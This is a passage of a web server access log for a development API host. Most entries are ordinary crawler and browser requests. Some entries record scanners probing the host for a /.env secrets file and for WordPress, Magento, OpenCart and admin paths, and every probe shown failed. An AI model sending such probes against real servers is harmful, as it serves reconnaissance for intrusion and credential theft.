Safari/537.36" "https://dev.profibot.hu/redoc" +[22/Jan/2026:23:35:10 +0000] - 200 200 - GET https dev.profibot.hu "/redoc" [Client 66.249.81.3] [Length 535] [Gzip 1.75] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:23:35:10 +0000] - 200 200 - GET https dev.profibot.hu "/redoc" [Client 66.249.81.3] [Length 535] [Gzip 1.75] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:23:35:10 +0000] - 200 200 - GET https dev.profibot.hu "/redoc" [Client 142.250.33.39] [Length 535] [Gzip 1.75] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:23:35:10 +0000] - 200 200 - GET https dev.profibot.hu "/api/v1/openapi.json" [Client 66.249.81.3] [Length 15787] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "https://dev.profibot.hu/redoc" +[23/Jan/2026:05:35:35 +0000] - - 301 - GET http dev.profibot.hu "/robots.txt" [Client 74.7.175.159] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[23/Jan/2026:05:35:36 +0000] - 404 404 - GET https dev.profibot.hu "/robots.txt" [Client 74.7.175.159] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "http://dev.profibot.hu/robots.txt" +[23/Jan/2026:06:35:33 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 84.1.26.27] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:06:35:33 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://dev.profibot.hu/" +[23/Jan/2026:06:35:50 +0000] - 200 200 - GET https dev.profibot.hu "/docs" [Client 84.1.26.27] [Length 526] [Gzip 1.92] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:06:35:50 +0000] - 200 200 - GET https dev.profibot.hu "/api/v1/openapi.json" [Client 84.1.26.27] [Length 15787] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://dev.profibot.hu/docs" +[23/Jan/2026:07:09:05 +0000] - 404 404 - GET https dev.profibot.hu "/force-fix-root" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:10:46 +0000] - 404 404 - GET https dev.profibot.hu "/force-fix-root" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:11:11 +0000] - 200 200 - GET https dev.profibot.hu "/docs" [Client 84.1.26.27] [Length 526] [Gzip 1.92] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:11:11 +0000] - 200 200 - GET https dev.profibot.hu "/api/v1/openapi.json" [Client 84.1.26.27] [Length 15787] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://dev.profibot.hu/docs" +[23/Jan/2026:07:15:12 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 84.1.26.27] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://dev.profibot.hu/docs" +[23/Jan/2026:07:17:01 +0000] - 404 404 - GET https dev.profibot.hu "/reboot-codeserver" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:23:41 +0000] - 404 404 - GET https dev.profibot.hu "/api/v1/force-fix-root" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:25:08 +0000] - 404 404 - GET https dev.profibot.hu "/api/v1/force-fix-root" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:25:09 +0000] - 404 404 - GET https dev.profibot.hu "/api/v1/force-fix-root" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:25:10 +0000] - 404 404 - GET https dev.profibot.hu "/api/v1/force-fix-root" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:25:10 +0000] - 404 404 - GET https dev.profibot.hu "/api/v1/force-fix-root" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:25:10 +0000] - 404 404 - GET https dev.profibot.hu "/api/v1/force-fix-root" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:25:10 +0000] - 404 404 - GET https dev.profibot.hu "/api/v1/force-fix-root" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:25:10 +0000] - 404 404 - GET https dev.profibot.hu "/api/v1/force-fix-root" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:18:52:29 +0000] - 404 404 - GET https dev.profibot.hu "/.env" [Client 204.76.203.25] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[23/Jan/2026:22:34:30 +0000] - - 301 - GET http dev.profibot.hu "/" [Client 100.48.162.207] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.85 Safari/537.36" "-" +[23/Jan/2026:22:34:31 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 100.48.162.207] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.85 Safari/537.36" "-" +[24/Jan/2026:02:19:20 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 149.57.180.175] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[24/Jan/2026:05:44:15 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 149.57.180.122] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[26/Jan/2026:02:28:13 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 204.76.203.25] [Length 67] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[26/Jan/2026:07:29:52 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 84.1.26.27] [Length 67] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:29:53 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://dev.profibot.hu/" +[27/Jan/2026:00:01:42 +0000] - - 301 - HEAD http dev.profibot.hu "/" [Client 62.210.198.160] [Length 0] [Gzip -] [Sent-to service_finder_api] "curl/7.81.0" "-" +[27/Jan/2026:00:01:42 +0000] - 405 405 - HEAD https dev.profibot.hu "/" [Client 62.210.198.160] [Length 0] [Gzip -] [Sent-to service_finder_api] "curl/7.81.0" "-" +[27/Jan/2026:00:01:42 +0000] - - 400 - HEAD http dev.profibot.hu "/" [Client 62.210.198.160] [Length 0] [Gzip -] [Sent-to ] "curl/7.81.0" "-" +[27/Jan/2026:00:01:44 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 62.210.198.160] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[27/Jan/2026:00:01:44 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico" [Client 62.210.198.160] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/" +[27/Jan/2026:00:01:46 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico" [Client 62.210.198.160] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[27/Jan/2026:00:01:47 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico/ads.txt" [Client 62.210.198.160] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[27/Jan/2026:00:01:47 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico/app-ads.txt" [Client 62.210.198.160] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[27/Jan/2026:00:01:47 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico/sellers.json" [Client 62.210.198.160] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[27/Jan/2026:01:21:38 +0000] - 404 404 - GET https dev.profibot.hu "/robots.txt" [Client 74.7.175.159] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[27/Jan/2026:02:46:36 +0000] - 405 405 - POST https dev.profibot.hu "/" [Client 20.51.155.167] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[27/Jan/2026:09:47:40 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 54.205.198.168] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0" "-" +[28/Jan/2026:04:23:29 +0000] - 404 404 - GET https dev.profibot.hu "/robots.txt" [Client 74.7.228.21] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[28/Jan/2026:04:23:30 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 74.7.227.62] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" +[28/Jan/2026:13:19:08 +0000] - - 301 - GET http dev.profibot.hu "/" [Client 180.184.183.62] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:08 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 180.184.183.62] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "http://dev.profibot.hu" +[28/Jan/2026:13:19:08 +0000] - - 301 - GET http dev.profibot.hu "/wp-json/wc/v3" [Client 180.184.183.62] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:09 +0000] - 404 404 - GET https dev.profibot.hu "/wp-json/wc/v3" [Client 180.184.183.62] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "http://dev.profibot.hu/wp-json/wc/v3" +[28/Jan/2026:13:19:09 +0000] - - 301 - GET http dev.profibot.hu "/magento_version" [Client 180.184.183.62] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:09 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 84.247.141.180] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:09 +0000] - 404 404 - GET https dev.profibot.hu "/wp-json/wc/v3" [Client 84.247.141.180] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:09 +0000] - 404 404 - GET https dev.profibot.hu "/magento_version" [Client 180.184.183.62] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "http://dev.profibot.hu/magento_version" +[28/Jan/2026:13:19:09 +0000] - 404 404 - GET https dev.profibot.hu "/magento_version" [Client 84.247.141.180] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:09 +0000] - 404 404 - GET https dev.profibot.hu "/index.php?route=checkout/cart" [Client 84.247.141.180] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:09 +0000] - 404 404 - GET https dev.profibot.hu "/index.php?route=account/register" [Client 84.247.141.180] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:09 +0000] - 404 404 - GET https dev.profibot.hu "/index.php?route=account/login" [Client 84.247.141.180] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:09 +0000] - 404 404 - GET https dev.profibot.hu "/index.php?route=checkout/checkout" [Client 84.247.141.180] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:09 +0000] - 404 404 - GET https dev.profibot.hu "/admin/" [Client 84.247.141.180] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:09 +0000] - 404 404 - GET https dev.profibot.hu "/wp-json/" [Client 84.247.141.180] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:09 +0000] - - 301 - GET http dev.profibot.hu "/index.php?route=checkout/cart" [Client 180.184.183.62] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:10 +0000] - 404 404 - GET https dev.profibot.hu "/index.php?route=checkout/cart" [Client 180.184.183.62] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "http://dev.profibot.hu/index.php?route=checkout/cart" +[28/Jan/2026:13:19:11 +0000] - - 301 - GET http dev.profibot.hu "/index.php?route=account/register" [Client 180.184.183.62] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:11 +0000] - 404 404 - GET https dev.profibot.hu "/index.php?route=account/register" [Client 180.184.183.62] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "http://dev.profibot.hu/index.php?route=account/register" +[28/Jan/2026:13:19:11 +0000] - - 301 - GET http dev.profibot.hu "/index.php?route=account/login" [Client 180.184.183.62] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:11 +0000] - 404 404 - GET https dev.profibot.hu "/index.php?route=account/login" [Client 180.184.183.62] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "http://dev.profibot.hu/index.php?route=account/login" +[28/Jan/2026:13:19:12 +0000] - - 301 - GET http dev.profibot.hu "/index.php?route=checkout/checkout" [Client 180.184.183.62] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:12 +0000] - 404 404 - GET https dev.profibot.hu "/index.php?route=checkout/checkout" [Client 180.184.183.62] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "http://dev.profibot.hu/index.php?route=checkout/checkout" +[28/Jan/2026:13:19:12 +0000] - - 301 - GET http dev.profibot.hu "/admin/" [Client 180.184.183.62] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:12 +0000] - 404 404 - GET https dev.profibot.hu "/admin/" [Client 180.184.183.62] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "http://dev.profibot.hu/admin/" +[28/Jan/2026:13:19:13 +0000] - - 301 - GET http dev.profibot.hu "/wp-json/" [Client 180.184.183.62] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:13 +0000] - 404 404 - GET https dev.profibot.hu "/wp-json/" [Client 180.184.183.62] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "http://dev.profibot.hu/wp-json/" +[29/Jan/2026:01:24:55 +0000] - 404 404 - GET https dev.profibot.hu "/.env" [Client 204.76.203.25] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[29/Jan/2026:12:16:25 +0000] - - 301 - GET http dev.profibot.hu "/" [Client 134.122.116.179] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[29/Jan/2026:12:16:25 +0000] - - 301 - GET http dev.profibot.hu "/favicon.ico" [Client 134.122.116.179] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "http://dev.profibot.hu/" +[29/Jan/2026:12:16:25 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 134.122.116.179] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[29/Jan/2026:12:16:28 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico" [Client 134.122.116.179] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://dev.profibot.hu/" +[30/Jan/2026:01:55:33 +0000] - 404 404 - GET https dev.profibot.hu "/robots.txt" [Client 74.7.228.21] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[30/Jan/2026:14:00:03 +0000] - - 301 - GET http dev.profibot.hu "/" [Client 35.239.140.12] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[30/Jan/2026:14:00:03 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 35.239.140.12] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://dev.profibot.hu" +[30/Jan/2026:15:45:24 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 34.91.36.231] [Length 52] [Gzip -] [Sent-to service_finder_api] "Scrapy/2.13.4 (+https://scrapy.org)" "-" +[31/Jan/2026:08:35:49 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 204.76.203.25] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:08:44:17 +0000] - 404 404 - GET https dev.profibot.hu "/robots.txt" [Client 16.147.192.47] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[31/Jan/2026:08:44:17 +0000] - 404 404 - GET https dev.profibot.hu "/enhancecp" [Client 16.147.192.47] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[31/Jan/2026:10:07:08 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 37.76.43.179] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:07:15 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/" +[31/Jan/2026:10:07:16 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 66.249.81.6] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:16 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 66.249.83.109] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:17 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 66.249.83.108] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[02/Feb/2026:19:26:06 +0000] - 200 200 - GET https dev.profibot.hu "/" 